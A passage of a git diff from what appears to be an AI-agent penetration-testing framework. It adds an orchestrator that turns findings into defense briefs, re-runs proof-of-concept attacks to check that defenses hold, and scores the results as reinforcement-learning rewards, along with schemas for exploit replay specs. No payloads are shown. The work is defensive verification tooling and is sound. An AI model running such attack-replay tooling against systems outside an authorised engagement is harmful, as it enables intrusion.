consensus.agreed_signals: + return ReAttackOutcome.BLOCKED + + if pre is None: + return ReAttackOutcome.PASSED + + post_positives = [r.positive for r in post.results] + pre_positives = [r.positive for r in pre.results] + if not pre_positives: + return ReAttackOutcome.PASSED + + flipped = sum(1 for p, q in zip(pre_positives, post_positives) if p and not q) + if flipped == len(pre_positives): + return ReAttackOutcome.BLOCKED + if 0 < flipped < len(pre_positives): + return ReAttackOutcome.PARTIAL + return ReAttackOutcome.PASSED + + # ── Reward computation ──────────────────────────────────────────────── + + def compute_reward(self, evidence: VerificationEvidence) -> RLVRReward: + reward_map = { + ReAttackOutcome.BLOCKED: 1.0, + ReAttackOutcome.PARTIAL: 0.5, + ReAttackOutcome.PASSED: 0.0, + ReAttackOutcome.ERROR: 0.0, + } + pre = evidence.pre_snapshot + post = evidence.post_snapshot + total = len(post.results) + blocked_checks = 0 + if pre is not None: + for p, q in zip(pre.results, post.results): + if p.positive and not q.positive: + blocked_checks += 1 + + base_reward = reward_map[evidence.re_attack_outcome] + + consensus = evidence.consensus + n_runs = 1 + success_rate = 1.0 + impact_confirmed = bool(evidence.impact_signals_matched) + + if consensus is not None: + n_runs = consensus.n_runs + success_rate = consensus.success_rate + + # Confidence: success_rate * (1.0 if no impact_patterns OR impact confirmed else 0.7) + # We can only know if spec had impact_patterns by checking impact_signals_matched + # plus the absence — but absence is ambiguous. Use evidence-only signal: if any + # impact signal matched, fully confident; otherwise neutral 1.0 multiplier. + confidence = success_rate * ( + 1.0 if impact_confirmed or not evidence.impact_signals_matched else 0.7 + ) + + return RLVRReward( + finding_ref=evidence.finding_ref, + reward=base_reward, + outcome=evidence.re_attack_outcome, + blocked_checks=blocked_checks, + total_checks=total, + poc_signals_matched=len(evidence.poc_evidence.success_signals_matched), + zfp_demoted=evidence.poc_evidence.zfp_demoted, + computed_at=time.time(), + confidence=confidence, + cvss_score=evidence.cvss_estimate.base_score if evidence.cvss_estimate else None, + is_duplicate=evidence.duplicate_of is not None, + impact_confirmed=impact_confirmed, + baseline_valid=evidence.baseline_valid, + success_rate=success_rate, + n_runs=n_runs, + ) + + # ── Persistence ─────────────────────────────────────────────────────── + + def persist_snapshot(self, snapshot: EnvironmentSnapshot) -> None: + out_dir = self._workspace / "verification" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{snapshot.finding_ref}-{snapshot.phase.value}-snapshot.json" + path.write_text(snapshot.model_dump_json(indent=2), encoding="utf-8") + log.debug("Snapshot written: %s", path) + + def persist_evidence(self, evidence: VerificationEvidence) -> None: + out_dir = self._workspace / "verification" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{evidence.finding_ref}-evidence.json" + path.write_text(evidence.model_dump_json(indent=2), encoding="utf-8") + log.debug("Evidence written: %s", path) + + def persist_baseline(self, baseline: BaselineEvidence) -> None: + out_dir = self._workspace / "verification" + out_dir.mkdir(parents=True, exist_ok=True) + path = out_dir / f"{baseline.finding_ref}-baseline.json" + path.write_text(baseline.model_dump_json(indent=2), encoding="utf-8") + log.debug("Baseline written: %s", path) + + def load_baseline(self, finding_ref: str) -> BaselineEvidence | None: + path = self._workspace / "verification" / f"{finding_ref}-baseline.json" + if not path.exists(): + return None + try: + return BaselineEvidence.model_validate_json(path.read_text(encoding="utf-8")) + except Exception as exc: + log.warning("Could not load baseline %s: %s", finding_ref, exc) + return None + + def persist_reward(self, reward: RLVRReward) -> None: + rlvr_dir = self._workspace / "rlvr" + rlvr_dir.mkdir(parents=True, exist_ok=True) + rewards_path = rlvr_dir / "rewards.jsonl" + with rewards_path.open("a", encoding="utf-8") as f: + f.write(reward.model_dump_json() + "\n") + log.info( + "RLVR reward written: finding=%s outcome=%s reward=%.1f", + reward.finding_ref, + reward.outcome, + reward.reward, + ) diff --git a/decepticon/core/subagent_streaming.py b/decepticon/core/subagent_streaming.py index 7ac61e7b..cc9d2f9f 100644 --- a/decepticon/core/subagent_streaming.py +++ b/decepticon/core/subagent_streaming.py @@ -137,7 +137,7 @@ def _emit_end( def _process_messages( self, new_messages: list, - active_tool_calls: dict[str, dict], + active_tool_calls: dict[str, Any], renderer: Any, has_renderer: bool, writer: Callable | None, @@ -166,7 +166,9 @@ def _process_messages( if hasattr(msg, "tool_calls") and msg.tool_calls: for tc in msg.tool_calls: - active_tool_calls[tc["id"]] = tc + tc_id: str | None = tc.get("id") + if tc_id is not None: + active_tool_calls[tc_id] = tc tc_args = { k: str(v) if not isinstance(v, (str, int, float, bool)) else v for k, v in tc["args"].items() diff --git a/decepticon/llm/factory.py b/decepticon/llm/factory.py index cf5515a2..0450d188 100644 --- a/decepticon/llm/factory.py +++ b/decepticon/llm/factory.py @@ -639,7 +639,7 @@ def _create_chat_model(self, model: str, temperature: float) -> BaseChatModel: belt-and-suspenders for any future client that bypasses this factory. """ - kwargs: dict[str, object] = { + kwargs: dict[str, Any] = { "model": model, "base_url": self._proxy.url, "api_key": SecretStr(self._proxy.api_key), diff --git a/decepticon/middleware/skills.py b/decepticon/middleware/skills.py index 74c272a2..f68784a6 100644 --- a/decepticon/middleware/skills.py +++ b/decepticon/middleware/skills.py @@ -36,6 +36,7 @@ from __future__ import annotations +import logging from collections import defaultdict from typing import TYPE_CHECKING, Any @@ -43,6 +44,8 @@ from deepagents.middleware.skills import SkillsMiddleware as BaseSkillsMiddleware from langchain_core.tools import tool +_log = logging.getLogger("decepticon.middleware.skills") + if TYPE_CHECKING: from deepagents.middleware.skills import SkillMetadata @@ -140,9 +143,11 @@ class SkillsMiddleware(BaseSkillsMiddleware): Args: backend: Backend instance for file operations. sources: List of skill source paths (e.g., ``['/skills/recon/', '/skills/shared/']``). + """ def __init__(self, *, backend: Any, sources: list[str]) -> None: + """Initialize with a backend and ordered skill source directories.""" super().__init__(backend=backend, sources=sources) self.system_prompt_template = DECEPTICON_SKILLS_PROMPT self.tools = [_build_load_skill_tool(backend)] @@ -155,6 +160,7 @@ def _read_workflow_for_source(self, backend: Any, source: str) -> str | None: try: res = backend.read(path) except Exception: + _log.warning("Failed to read workflow at %s (backend error)", path) return None if getattr(res, "error", None): return None @@ -172,6 +178,7 @@ async def _aread_workflow_for_source(self, backend: Any, source: str) -> str | N try: res = await backend.aread(path) except Exception: + _log.warning("Failed to async-read workflow at %s (backend error)", path) return None if getattr(res, "error", None): return None @@ -372,6 +379,7 @@ def _list_dir_via_backend(backend: Any, dir_path: str) -> list[str]: try: res = backend.ls(dir_path) except Exception: + _log.warning("Failed to list skill directory %s (backend error)", dir_path) return [] if getattr(res, "error", None): return [] diff --git a/decepticon/orchestrator.py b/decepticon/orchestrator.py new file mode 100644 index 00000000..deb13d2d --- /dev/null +++ b/decepticon/orchestrator.py @@ -0,0 +1,578 @@ +"""Vaccine Orchestrator — attack↔defend↔verify feedback loop. + +Sits above the existing Ralph offensive loop. For each finding discovered +by the offensive agent, the orchestrator: + +1. Generates a defense-brief from the finding +2. Invokes the defense agent to apply remediation +3. Re-runs the same attack vector to verify the defense holds +4. Records the verification result + +The loop continues until all findings are processed or max_iterations +is reached. +""" + +from __future__ import annotations + +import json +import os +from datetime import datetime, timezone +from enum import StrEnum +from pathlib import Path + +from pydantic import BaseModel, Field + +from decepticon.core.env_verifier import EnvironmentVerifier +from decepticon.core.logging import get_logger +from decepticon.schemas.defense_brief import ( + DefenseActionResult, + DefenseActionType, + DefenseBrief, + DefenseRecommendation, + ReAttackOutcome, + VerificationResult, +) +from decepticon.schemas.env_verification import CheckPhase +from decepticon.tools.bash.bash import get_sandbox +from decepticon.tools.research.poc import sandbox_runner + +log = get_logger("orchestrator") + + +# ── Enums ────────────────────────────────────────────────────────────────────── + + +class OrchestratorPhase(StrEnum): + """Current phase of the vaccine orchestration loop.""" + + ATTACK = "attack" + BRIEF_GENERATION = "brief_generation" + DEFENSE = "defense" + VERIFICATION = "verification" + COMPLETE = "complete" + + +# ── State model ──────────────────────────────────────────────────────────────── + + +class OrchestratorState(BaseModel): + """Persisted state for the vaccine orchestration loop. + + Written to ``workspace/.vaccine-state.json`` after each iteration so the + loop can be resumed after an interruption. + """ + + phase: OrchestratorPhase = OrchestratorPhase.ATTACK + iteration: int = 0 + max_iterations: int = 10 + findings_discovered: list[str] = Field(default_factory=list) + findings_processed: list[str] = Field(default_factory=list) + defenses_applied: list[DefenseActionResult] = Field(default_factory=list) + verification_results: list[VerificationResult] = Field(default_factory=list) + started_at: datetime = Field(default_factory=lambda: datetime.now(timezone.utc)) + + +# ── Orchestrator ─────────────────────────────────────────────────────────────── + + +class VaccineOrchestrator: + """Coordinates the attack↔defend↔verify feedback loop. + + The orchestrator does not directly invoke the defense agent — it prepares + the defense brief on disk and reads back verification results that the + defense agent writes after executing its actions. This keeps the + orchestrator decoupled from agent implementation details. + + Typical external integration:: + + orchestrator = VaccineOrchestrator(workspace) + state = await orchestrator.run() + """ + + def __init__( + self, + workspace: Path, + state: OrchestratorState | None = None, + verifier: EnvironmentVerifier | None = None, + ) -> None: + self.workspace = workspace + self._state_path = workspace / ".vaccine-state.json" + self.state: OrchestratorState = ( + state if state is not None else (self._load_state() or OrchestratorState()) + ) + if verifier is not None: + self._verifier: EnvironmentVerifier | None = verifier + else: + sandbox = get_sandbox() + self._verifier = ( + EnvironmentVerifier(workspace, sandbox_runner(sandbox)) + if sandbox is not None + else None + ) + + # ── Public API ───────────────────────────────────────────────────────────── + + async def run(self) -> OrchestratorState: + """Run the vaccine loop until all findings are processed or max_iterations reached. + + Returns the final :class:`OrchestratorState`. + """ + state = self.state + + while state.iteration < state.max_iterations: + state.iteration += 1 + log.info( + "Vaccine iteration %d/%d", + state.iteration, + state.max_iterations, + ) + + # Phase 1: Discover new findings + state.phase = OrchestratorPhase.ATTACK + new_findings = self._scan_findings() + state.findings_discovered = new_findings + unprocessed = [f for f in new_findings if f not in state.findings_processed] + + if not unprocessed: + log.info("No unprocessed findings remaining — loop complete") + break + + log.info( + "Found %d unprocessed finding(s): %s", + len(unprocessed), + ", ".join(unprocessed), + ) + + for finding_ref in unprocessed: + # Phase 2: Generate defense brief + state.phase = OrchestratorPhase.BRIEF_GENERATION + log.info("Generating defense brief for %s", finding_ref) + brief = self._generate_brief(finding_ref) + if brief is None: + log.warning("Could not generate brief for %s — skipping", finding_ref) + continue + self._save_brief(brief) + log.info( + "Defense brief written for %s (%d recommended action(s))", + finding_ref, + len(brief.recommended_actions), + ) + + # Phase 3: Defense + # The actual defense agent invocation happens externally. + # The orchestrator writes the brief; the defense agent reads it, + # executes actions, and writes back a verification result. + state.phase = OrchestratorPhase.DEFENSE + log.info( + "Waiting for defense agent to process %s (brief at %s)", + finding_ref, + self.workspace / "defense-brief.json", + ) + + # Phase 4: Verification + state.phase = OrchestratorPhase.VERIFICATION + result = await self._verify_finding(finding_ref) + if result is not None: + state.verification_results.append(result) + if result.re_attack_outcome == ReAttackOutcome.BLOCKED: + log.info("Defense VERIFIED for %s", finding_ref) + else: + log.warning( + "Defense FAILED for %s: outcome=%s", + finding_ref, + result.re_attack_outcome, + ) + else: + log.warning( + "No verification result found for %s — defense agent may not have run", + finding_ref, + ) + + state.findings_processed.append(finding_ref) + + self._save_state() + + state.phase = OrchestratorPhase.COMPLETE + self._save_state() + log.info( + "Vaccine loop complete — %d finding(s) processed, %d verified", + len(state.findings_processed), + sum( + 1 + for r in state.verification_results + if r.re_attack_outcome == ReAttackOutcome.BLOCKED + ), + ) + return state + + @property + def summary(self) -> dict[str, object]: + """Return a summary dict with counts and current status.""" + state = self.state + verified = sum( + 1 for r in state.verification_results if r.re_attack_outcome == ReAttackOutcome.BLOCKED + ) + failed = sum( + 1 for r in state.verification_results if r.re_attack_outcome != ReAttackOutcome.BLOCKED + ) + return { + "phase": state.phase, + "iteration": state.iteration, + "max_iterations": state.max_iterations, + "findings_discovered": len(state.findings_discovered), + "findings_processed": len(state.findings_processed), + "verified": verified, + "failed": failed, + "started_at": state.started_at.isoformat(), + } + + # ── Internal helpers ─────────────────────────────────────────────────────── + + def _scan_findings(self) -> list[str]: + """Scan ``workspace/findings/`` for FIND-*.md files. + + Returns a sorted list of finding refs (e.g. ``["FIND-001", "FIND-002"]``). + """ + findings_dir = self.workspace / "findings" + if not findings_dir.is_dir(): + log.debug("Findings directory does not exist: %s", findings_dir) + return [] + + refs: list[str] = [] + for path in sorted(findings_dir.glob("FIND-*.md")): + # Strip the ``.md`` suffix to get the bare ref (FIND-001) + refs.append(path.stem) + + log.debug("Scanned %d finding(s) from %s", len(refs), findings_dir) + return refs + + def _generate_brief(self, finding_ref: str) -> DefenseBrief | None: + """Read a finding markdown file and produce a :class:`DefenseBrief`. + + Parses key fields from the frontmatter-style header lines present in + Decepticon finding documents (``# Title``, ``**Severity**:``, etc.). + Falls back to safe defaults when fields are absent so that a brief is + always emitted for any readable finding. + + Returns ``None`` only when the finding file cannot be read. + """ + finding_path = self.workspace / "findings" / f"{finding_ref}.md" + if not finding_path.exists(): + log.warning("Finding file not found: %s", finding_path) + return None + + try: + content = finding_path.read_text(encoding="utf-8") + except OSError as exc: + log.error("Could not read finding %s: %s", finding_path, exc) + return None + + title, severity, attack_vector, affected_assets, evidence_summary = self._parse_finding( + content + ) + + recommended_actions = self._infer_recommendations(attack_vector, severity) + + return DefenseBrief( + finding_ref=finding_ref, + finding_title=title, + severity=severity, + attack_vector=attack_vector, + affected_assets=affected_assets, + recommended_actions=recommended_actions, + evidence_summary=evidence_summary, + ) + + def _parse_finding(self, content: str) -> tuple[str, str, str, list[str], str]: + """Extract structured fields from a finding markdown document. + + Returns ``(title, severity, attack_vector, affected_assets, evidence_summary)``. + """ + lines = content.splitlines() + title = "Unknown Finding" + severity = "medium" + attack_vector = "" + affected_assets: list[str] = [] + evidence_summary = "" + + # Title: first H1 heading + for line in lines: + stripped = line.strip() + if stripped.startswith("# "): + title = stripped[2:].strip() + break + + # Severity: line containing "**Severity**:" or "Severity:" + for line in lines: + lower = line.lower() + if "severity" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2: + candidate = parts[1].strip().strip("*").strip().lower() + if candidate in {"critical", "high", "medium", "low", "informational"}: + severity = candidate + break + + # Attack vector: line containing "**Attack Vector**:" or section header + capture_vector = False + vector_lines: list[str] = [] + for line in lines: + lower = line.lower() + if "attack vector" in lower and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + vector_lines = [parts[1].strip()] + break + capture_vector = True + continue + if capture_vector: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped: + vector_lines.append(stripped) + if len(vector_lines) >= 3: + break + if vector_lines: + attack_vector = " ".join(vector_lines) + + # Affected assets: lines under "**Affected**:" or "**Assets**:" + capture_assets = False + for line in lines: + lower = line.lower() + if ("affected" in lower or "assets" in lower) and ":" in lower: + parts = line.split(":", 1) + if len(parts) == 2 and parts[1].strip(): + for asset in parts[1].split(","): + asset = asset.strip() + if asset: + affected_assets.append(asset) + break + capture_assets = True + continue + if capture_assets: + stripped = line.strip() + if stripped.startswith("#") or (stripped.startswith("**") and ":" in stripped): + break + if stripped.startswith("-") or stripped.startswith("*"): + asset = stripped.lstrip("-* ").strip() + if asset: + affected_assets.append(asset) + + # Evidence summary: first non-empty paragraph after "## Evidence" heading + capture_evidence = False + for line in lines: + stripped = line.strip() + if stripped.lower() in {"## evidence", "### evidence"}: + capture_evidence = True + continue + if capture_evidence: + if stripped.startswith("#"): + break + if stripped: + evidence_summary = stripped + break + + return title, severity, attack_vector, affected_assets, evidence_summary + + def _infer_recommendations( + self, attack_vector: str, severity: str + ) -> list[DefenseRecommendation]: + """Infer a minimal set of defensive recommendations from the attack vector text. + + Uses keyword matching to produce actionable :class:`DefenseRecommendation` + objects. The defense agent is expected to refine these based on the full + brief context. + """ + lower = attack_vector.lower() + recommendations: list[DefenseRecommendation] = [] + priority = 1 + + if any(kw in lower for kw in ("port", "tcp", "udp", "service", "listen")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.BLOCK_PORT, + target="affected-port", + priority=priority, + rationale=( + "Attack vector references a network port or listening service — " + "block inbound access as an immediate containment measure" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("ssh", "ftp", "telnet", "smb", "rdp", "vnc")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.DISABLE_SERVICE, + target="affected-service", + priority=priority, + rationale=( + "Attack vector references a remote-access protocol — " + "disable or harden the service to remove the attack surface" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("credential", "password", "token", "key", "secret", "auth")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.REVOKE_CREDENTIAL, + target="compromised-credential", + priority=priority, + rationale=( + "Attack vector involves credentials or authentication — " + "revoke and rotate affected credentials immediately" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("config", "misconfigur", "permission", "acl", "setting")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.UPDATE_CONFIG, + target="affected-config", + priority=priority, + rationale=( + "Attack vector references a misconfiguration — " + "update the relevant configuration to enforce secure defaults" + ), + ) + ) + priority += 1 + + if any(kw in lower for kw in ("process", "pid", "daemon", "spawn", "exec")): + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.KILL_PROCESS, + target="affected-process", + priority=priority, + rationale=( + "Attack vector involves a running process — " + "terminate the process to halt active exploitation" + ), + ) + ) + priority += 1 + + # Always recommend a firewall rule for critical/high findings with no other actions + if severity in {"critical", "high"} and not recommendations: + recommendations.append( + DefenseRecommendation( + action_type=DefenseActionType.ADD_FIREWALL_RULE, + target="affected-host", + priority=1, + rationale=( + f"High-severity finding ({severity}) with no specific vector keywords — " + "add a restrictive firewall rule as a precautionary measure" + ), + ) + ) + + return recommendations + + def _save_brief(self, brief: DefenseBrief) -> None: + """Write the defense brief to ``workspace/defense-brief.json``.""" + brief_path = self.workspace / "defense-brief.json" + try: + brief_path.write_text( + brief.model_dump_json(indent=2), + encoding="utf-8", + ) + log.debug("Defense brief written to %s", brief_path) + except OSError as exc: + log.error("Failed to write defense brief: %s", exc) + + def _load_verification_result(self, finding_ref: str) -> VerificationResult | None: + """Load ``workspace/verification-{finding_ref}.json`` if it exists.""" + result_path = self.workspace / f"verification-{finding_ref}.json" + if not result_path.exists(): + log.debug("Verification result not found: %s", result_path) + return None + + try: + data = json.loads(result_path.read_text(encoding="utf-8")) + return VerificationResult.model_validate(data) + except (OSError, ValueError) as exc: + log.error("Failed to load verification result %s: %s", result_path, exc) + return None + + async def _verify_finding(self, finding_ref: str) -> VerificationResult | None: + """Try env-grounded verification first; fall back to legacy LLM result.""" + use_env = os.environ.get("VACCINE_USE_ENV_VERIFIER", "1") != "0" + if use_env and self._verifier is not None: + spec = self._verifier.load_spec(finding_ref) + if spec is not None: + post = await self._verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + pre = self._verifier.load_snapshot(finding_ref, CheckPhase.PRE_DEFENSE) + evidence = await self._verifier.verify_blocked(spec, pre=pre, post=post) + reward = self._verifier.compute_reward(evidence) + self._verifier.persist_evidence(evidence) + self._verifier.persist_reward(reward) + return VerificationResult( + finding_ref=finding_ref, + defense_actions_applied=[], + re_attack_outcome=evidence.re_attack_outcome, + re_attack_details=( + f"env-verified reward={reward.reward:.1f} " + f"poc_hash={evidence.poc_evidence.output_hash}" + ), + ) + return self._load_verification_result(finding_ref) + + def _save_state(self) -> None: + """Persist current :class:`OrchestratorState` to ``workspace/.vaccine-state.json``.""" + try: + self._state_path.write_text( + self.state.model_dump_json(indent=2), + encoding="utf-8", + ) + log.debug("Orchestrator state saved to %s", self._state_path) + except OSError as exc: + log.error("Failed to save orchestrator state: %s", exc) + + def _load_state(self) -> OrchestratorState | None: + """Load persisted :class:`OrchestratorState` from disk for resuming an interrupted run.""" + if not self._state_path.exists(): + return None + + try: + data = json.loads(self._state_path.read_text(encoding="utf-8")) + state = OrchestratorState.model_validate(data) + log.info( + "Resumed orchestrator state from %s (iteration %d)", + self._state_path, + state.iteration, + ) + return state + except (OSError, ValueError) as exc: + log.error("Failed to load orchestrator state from %s: %s", self._state_path, exc) + return None + + +# ── Convenience entry point ──────────────────────────────────────────────────── + + +async def run_vaccine_loop( + workspace: str | Path, + max_iterations: int = 10, +) -> OrchestratorState: + """Entry point for the vaccine orchestration loop. + + Creates a fresh :class:`OrchestratorState`, builds a :class:`VaccineOrchestrator`, + and runs the full attack↔defend↔verify cycle. + + Args: + workspace: Path to the engagement workspace directory. + max_iterations: Maximum number of loop iterations before stopping. + + Returns: + The final :class:`OrchestratorState` after the loop completes. + """ + workspace = Path(workspace) + state = OrchestratorState(max_iterations=max_iterations) + orchestrator = VaccineOrchestrator(workspace, state) + return await orchestrator.run() diff --git a/decepticon/schemas/__init__.py b/decepticon/schemas/__init__.py new file mode 100644 index 00000000..00ee353a --- /dev/null +++ b/decepticon/schemas/__init__.py @@ -0,0 +1,19 @@ +"""Decepticon schemas — shared Pydantic models for inter-agent communication.""" + +from decepticon.schemas.defense_brief import ( + DefenseActionResult, + DefenseActionType, + DefenseBrief, + DefenseRecommendation, + ReAttackOutcome, + VerificationResult, +) + +__all__ = [ + "DefenseActionType", + "DefenseBrief", + "DefenseRecommendation", + "DefenseActionResult", + "ReAttackOutcome", + "VerificationResult", +] diff --git a/decepticon/schemas/defense_brief.py b/decepticon/schemas/defense_brief.py new file mode 100644 index 00000000..fd0c7a00 --- /dev/null +++ b/decepticon/schemas/defense_brief.py @@ -0,0 +1,166 @@ +"""Defense brief schemas — structured feedback documents for inter-agent communication. + +These models define the data contract between the offensive recon agent and the +defensive response agent (Offensive Vaccine). The flow is: + + Offensive agent → DefenseBrief → Defense agent → VerificationResult → Ralph loop + +Each DefenseBrief maps one-to-one with a finding (FIND-NNN) and carries the +structured information a defense agent needs to apply mitigations and then +re-verify via a controlled re-attack. +""" + +from __future__ import annotations + +from datetime import datetime, timezone +from enum import StrEnum + +from pydantic import BaseModel, Field + +# ── Enums ───────────────────────────────────────────────────────────── + + +class DefenseActionType(StrEnum): + """Discrete defensive action categories the defense agent can execute. + + Each value maps to a concrete remediation primitive the sandbox or + target host can perform. The defense agent selects one or more per finding. + """ + + BLOCK_PORT = "block_port" + ADD_FIREWALL_RULE = "add_firewall_rule" + DISABLE_SERVICE = "disable_service" + RESTART_SERVICE = "restart_service" + UPDATE_CONFIG = "update_config" + KILL_PROCESS = "kill_process" + REVOKE_CREDENTIAL = "revoke_credential" + + +class ReAttackOutcome(StrEnum): + """Outcome of re-running the original attack after defensive actions were applied. + + Used to determine whether a defense was effective, partial, or failed. + """ + + BLOCKED = "blocked" # Attack was fully mitigated — finding is closed + PASSED = "passed" # Attack still succeeds — defense was ineffective + PARTIAL = "partial" # Attack partially mitigated — follow-up needed + ERROR = "error" # Re-attack could not complete (infra/tooling issue) + + +# ── Models ───────────────────────────────────────────────────────────── + + +class DefenseRecommendation(BaseModel): + """A single recommended defensive action from the offensive agent. + + The offensive agent populates these inside a DefenseBrief. The defense + agent reads them and decides which to execute, in which order. + """ + + action_type: DefenseActionType = Field(description="Category of defensive action to take") + target: str = Field( + description=( + "What to act on — port notation (e.g. 'tcp/8080'), service name " + "(e.g. 'sshd'), IP/hostname (e.g. '10.0.0.5'), or credential ID" + ) + ) + parameters: dict[str, str] = Field( + default_factory=dict, + description="Action-specific key/value parameters (e.g. {'rule': 'DROP', 'chain': 'INPUT'})", + ) + priority: int = Field( + default=1, + description="Execution priority: 1 = highest. Lower numbers run first.", + ) + rationale: str = Field( + description="Why this action is recommended — links back to the attack vector" + ) + + +class DefenseBrief(BaseModel): + """Structured feedback document passed from the offensive agent to the defense agent. + + One DefenseBrief is generated per finding. It carries everything the defense + agent needs to understand the vulnerability and apply targeted mitigations + without needing to re-read raw findings files. + """ + + finding_ref: str = Field(description="Reference to the source finding, e.g. 'FIND-001'") + finding_title: str = Field(description="Human-readable title matching the finding document") + severity: str = Field( + description=( + "Finding severity using FindingSeverity values: " + "critical, high, medium, low, informational" + ) + ) + attack_vector: str = Field( + description="Description of how the attack worked — what was exploited and how" + ) + affected_assets: list[str] = Field( + default_factory=list, + description="IPs, hostnames, and service identifiers affected by this finding", + ) + recommended_actions: list[DefenseRecommendation] = Field( + default_factory=list, + description="Ordered list of defensive actions the defense agent should consider", + ) + evidence_summary: str = Field( + default="", + description="Brief summary of exploitation evidence from the offensive run", + ) + created_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + description="Timestamp when this brief was generated (UTC)", + ) + + +class DefenseActionResult(BaseModel): + """Result of executing a single defensive action on the target. + + Populated by the defense agent after attempting each action from a + DefenseRecommendation. Collected into a VerificationResult. + """ + + action_type: DefenseActionType = Field( + description="The type of defensive action that was executed" + ) + target: str = Field(description="The specific target the action was applied to") + success: bool = Field(description="Whether the action was applied successfully") + message: str = Field( + description="Human-readable result message — include error detail on failure" + ) + rollback_command: str | None = Field( + default=None, + description="Shell command to undo this action if needed during deconfliction", + ) + executed_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + description="Timestamp when the action was executed (UTC)", + ) + + +class VerificationResult(BaseModel): + """Result of re-attack verification after defensive actions were applied. + + The defense agent populates this after executing all actions from a + DefenseBrief and performing a controlled re-attack. The ralph loop reads + this to determine whether to close the finding or escalate. + """ + + finding_ref: str = Field(description="Reference to the finding being verified, e.g. 'FIND-001'") + defense_actions_applied: list[DefenseActionResult] = Field( + default_factory=list, + description="Results for every defensive action that was attempted", + ) + re_attack_outcome: ReAttackOutcome = Field( + description="Whether the re-attack was blocked, passed, partial, or errored" + ) + re_attack_details: str = Field( + default="", + description="What happened during the re-attack — tool output, observations, conclusions", + ) + verified_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + description="Timestamp when re-attack verification completed (UTC)", + ) diff --git a/decepticon/schemas/env_verification.py b/decepticon/schemas/env_verification.py new file mode 100644 index 00000000..35134234 --- /dev/null +++ b/decepticon/schemas/env_verification.py @@ -0,0 +1,114 @@ +"""Environment-grounded verification schemas replacing LLM-judged VerificationResult.""" + +from __future__ import annotations + +import time +from enum import StrEnum +from typing import Any + +from pydantic import BaseModel, Field + +from decepticon.schemas.defense_brief import ReAttackOutcome + + +class CheckPhase(StrEnum): + PRE_DEFENSE = "pre_defense" + POST_DEFENSE = "post_defense" + + +class TargetCheckResult(BaseModel): + check_id: str + kind: str + phase: CheckPhase + signal: dict[str, Any] = Field(default_factory=dict) + positive: bool + raw_excerpt: str = "" + + +class EnvironmentSnapshot(BaseModel): + finding_ref: str + phase: CheckPhase + results: list[TargetCheckResult] = Field(default_factory=list) + captured_at: float = Field(default_factory=time.time) + + +class PoCEvidence(BaseModel): + exit_code: int + success_signals_matched: list[str] + zfp_demoted: bool + output_hash: str + stdout_excerpt: str = "" + stderr_excerpt: str = "" + + +class PoCRunResult(BaseModel): + run_index: int + exit_code: int + signals_matched: list[str] + output_hash: str + stdout_excerpt: str = "" + stderr_excerpt: str = "" + succeeded: bool + + +class PoCConsensus(BaseModel): + n_runs: int + n_success: int + success_rate: float + agreed_signals: list[str] + zfp_demoted: bool + run_results: list[PoCRunResult] + + +class BaselineEvidence(BaseModel): + finding_ref: str + valid: bool + consensus: PoCConsensus + captured_at: float = Field(default_factory=time.time) + + +class CVSSEstimate(BaseModel): + attack_vector: str = "N" + attack_complexity: str = "L" + privileges_required: str = "N" + user_interaction: str = "N" + scope: str = "U" + confidentiality: str = "N" + integrity: str = "N" + availability: str = "N" + base_score: float = 0.0 + vector_string: str = "" + + +class VerificationEvidence(BaseModel): + finding_ref: str + pre_snapshot: EnvironmentSnapshot | None + post_snapshot: EnvironmentSnapshot + poc_evidence: PoCEvidence + re_attack_outcome: ReAttackOutcome + verified_at: float = Field(default_factory=time.time) + baseline_evidence: BaselineEvidence | None = None + consensus: PoCConsensus | None = None + impact_signals_matched: list[str] = Field(default_factory=list) + cvss_estimate: CVSSEstimate | None = None + duplicate_of: str | None = None + baseline_valid: bool = True + inconclusive: bool = False + + +class RLVRReward(BaseModel): + finding_ref: str + reward: float # 0.0, 0.5, or 1.0 + outcome: ReAttackOutcome + blocked_checks: int = 0 + total_checks: int = 0 + poc_signals_matched: int = 0 + zfp_demoted: bool = False + computed_at: float = Field(default_factory=time.time) + confidence: float = 1.0 + cvss_score: float | None = None + is_duplicate: bool = False + impact_confirmed: bool = False + baseline_valid: bool = True + success_rate: float = 1.0 + n_runs: int = 1 diff --git a/decepticon/schemas/exploit_spec.py b/decepticon/schemas/exploit_spec.py new file mode 100644 index 00000000..d3495282 --- /dev/null +++ b/decepticon/schemas/exploit_spec.py @@ -0,0 +1,68 @@ +"""Machine-readable exploit replay spec written by offensive agents at finding time.""" + +from __future__ import annotations + +from typing import Annotated, Literal, Union + +from pydantic import BaseModel, Field + + +class PortCheck(BaseModel): + kind: Literal["port"] = "port" + host: str + port: int + protocol: str = "tcp" # "tcp" or "udp" + + +class ServiceCheck(BaseModel): + kind: Literal["service"] = "service" + url: str + expected_status: int = 200 + body_pattern: str | None = None + + +class CredentialCheck(BaseModel): + kind: Literal["credential"] = "credential" + command: str + success_pattern: str + + +class CommandOutputCheck(BaseModel): + kind: Literal["command"] = "command" + command: str + pattern: str + expect_match: bool = True + + +class FileCheck(BaseModel): + kind: Literal["file"] = "file" + path: str + must_exist: bool = True + content_pattern: str | None = None + + +TargetCheck = Annotated[ + Union[PortCheck, ServiceCheck, CredentialCheck, CommandOutputCheck, FileCheck], + Field(discriminator="kind"), +] + + +class ExploitSpec(BaseModel): + finding_ref: str = Field(description="Finding reference, e.g. FIND-001") + poc_command: str = Field(description="Exact shell command reproducing the exploit") + success_patterns: list[str] = Field( + min_length=1, description="Regexes proving exploit succeeded" + ) + negative_command: str | None = Field(default=None, description="ZFP 